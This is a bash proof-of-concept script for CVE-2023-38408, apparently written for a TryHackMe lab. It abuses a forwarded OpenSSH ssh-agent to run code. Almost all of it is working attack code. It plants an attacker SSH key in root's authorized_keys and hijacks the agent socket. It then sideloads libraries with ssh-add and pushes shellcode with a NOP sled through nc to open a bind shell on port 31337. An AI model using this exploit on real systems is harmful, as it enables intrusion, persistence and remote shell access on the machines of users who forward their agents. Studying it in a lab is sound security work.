#!/bin/bash


# Exploit Title: Remote Code Execution in OpenSSH's forwarded ssh-agent
# Date: Aug 8 ,2023
# Exploit Author: Qualys Threat Research Unit
# Vendor Homepage: n/a
# Software Link: n/a
# Version: OpenSSH versions preceding 9.3p2
# Tested on: Ubuntu 21.04
# CVE : CVE-2023-38408


# author: Max Ahartz
# inpired by: PrOtagOnist
# created: Aug 8, 2023
# description: Automated Bash script for CVE-2023-38408 PoC
# tested on TryHackMe's Lab Environment only, using their machines.
# https://tryhackme.com/room/cve202338408


echo "  _________.__    .___     .____                     .___            "
echo " /   _____/|__| __| _/____ |    |    _________     __| _/___________ "
echo " \_____  \ |  |/ __ |/ __ \|    |   /  _ \__  \   / __ |/ __ \_  __ \ "
echo " /        \|  / /_/ \  ___/|    |__(  <_> ) __ \_/ /_/ \  ___/|  | \/"
echo "/_______  /|__\____ |\___  >_______ \____(____  /\____ |\___  >__|   "
echo "        \/         \/    \/        \/         \/      \/    \/       "


echo "CVE-2023-38408 PoC"
                                                
echo;echo

#GET ATTACKERIP 3 OPTIONS: Input,Hard-Coded,Full-Auto
#read -p "Enter the AttackerBox IP address: " attackerIP
#attackerIP=10.10.123.236
attackerIP=$(ip a|grep ens5|grep inet|cut -d '/' -f 1|cut -d ' ' -f 6)

#GET ROOMIP: 3 OPTIONS: Input,Hard-Coded,Full-Auto
read -p "Enter the ROOM IP address: " roomIP
#roomIP=10.10.83.183
# Run the arp,extract the 3rd row with sed,
# extract IP using awk, cutting the ()
#roomIP=$(arp -a | sed -n '3p' | awk -F'[()]' '{print $2}')

echo "Room IP address: $roomIP"

echo -e "\nFrom ATTACKBOX, in new term, login with SSH. Type \e[1;32mssh redqueenrebel@$roomIP\e[0m"
echo -e "Enter password \e[1;32m'DownTheRabbitHole!'\e[0m"


function Wait_for_EnterKey {
    echo -e "\nI'll wait for you here..."
    while true; do
    echo "Press Enter to continue:"
    read -rsn 1 key

    if [[ $key == "" ]]; then
        echo "Continuing..."
        break
    else
        echo -e "\033[1A\033[KInvalid key pressed. Press Enter to continue:"
    fi
done

}


#CLEAR TMP DIR OF PRIOR SSH-SESSIONS
rm -rf /tmp/ssh*

#ADD ALICE SSH KEY
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCs4FT0kCeBfQ1co/PeApZn3NmZ68mUwEEbtP598IcBBDgpe+AauGtOVNxsptmZD26yjhTXp4RJgrreUgPJQ8ICDUvASD/2W8GOl5XpYddbrcHy+djyViQV/69VskB2Y9LCobbkYPBUjIKlObqgamM7HhcNO3Zu65AAtbu+31+N+swygYjTRB37cjQOLgI7FM9nmuhyb8uSMtttTJRD7ybXPfiHV8YxLENuJU0BGggc9i/hXKQKwhEvnliiqw/XdpK/JyT6t65DFvYYkT21bPHpBDMNzPauUgr2yagKMFNe8HFQfk/QibTcLMeV0JmCGeOcv8oJP/T4xJnnoetMvZGEPZ4hXH7E3n2wksLjuF2se61/c+SIh6Zm+gUYQESTAmmbRPeTj7RcZPRN22knpSyu76eZKBf/dmHYXQlIk1gKsouFdposOpxYRJ4Wt97uEPihW/wzzT+QPcLyYoGpbFXJmpqNaOBVJw1n0KqB98dL5Ixa32FKTCzaBPHkDmK/I2M= alice@workstation" >> /root/.ssh/authorized_keys

echo -e "\nEnter this command in redqueen term: \e[1;32mecho ${attackerIP} > /tmp/ip.txt\e[0m"

Wait_for_EnterKey

#Wait for connection
echo -e "\nWait 1 min for background connection...\n"
sleep 60

#FIND SSH-AGENT AND SET AS ENV VAR
agent_path=$(echo /tmp/ssh-*/agent.*)
export SSH_AUTH_SOCK="$agent_path"
echo -e "\nSSH_AUTH_SOCK set to: $SSH_AUTH_SOCK\n"

#Sideload 1st library 
ssh-add -s /usr/lib/systemd/boot/efi/linuxx64.elf.stub

SHELLCODE=$'\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0\x4d\x31\xd2\x41\x52\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x7a\x69\x48\x89\xe6\x41\x50\x5f\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x41\x50\x5f\x6a\x01\x5e\x6a\x32\x58\x0f\x05\x48\x89\xe6\x48\x31\xc9\xb1\x10\x51\x48\x89\xe2\x41\x50\x5f\x6a\x2b\x58\x0f\x05\x59\x4d\x31\xc9\x49\x89\xc1\x4c\x89\xcf\x48\x31\xf6\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05'

#UPLOAD SHELLCODE TO VICTIM '&' makes this command a background job
(perl -e 'print "\0\0\x27\xbf\x14\0\0\0\x10/usr/lib/modules\0\0\x27\xa6" . "\x90" x 10000'; echo -n "$SHELLCODE") | nc -U "$SSH_AUTH_SOCK" &

#WAIT FOR TRANSFER TO FINISH
echo -e "\nTransfering your shellcode now.  Please stand by..."
sleep 10
kill $! #Sends an interupt signal to the background job (like Ctrl-C)
echo -e "Transfer complete\n"

#Sideload 2nd library to register the signal handler for the Segmentation Fault (SIGSEGV) signal.
ssh-add -s /usr/lib/titan/libttcn3-rt2-dynamic.so

#Sideload 3rd replaces the signal handler routine with a gadget that redirects execution back to the stack
ssh-add -s /usr/lib/x86_64-linux-gnu/libKF5SonnetUi.so.5.92.0

echo -e "\nOK! Last steps...Hit \e[1;32mEnter\e[0m," 
echo -e "then In redqueen terminal, type \e[1;32mnc localhost 31337\e[0m to access the bind shell (shellcode)."
echo -e "\nEnjoy your shell! For Flag type \e[1;32mcat /home/alice/Desktop/*\e[0m"

#Sideload last library to cause segfault and execute the shellcode
ssh-add -s /usr/lib/x86_64-linux-gnu/libns3.35-wave.so.0.0.0

#Keep script running for connection to bind shell
while true; do true
done
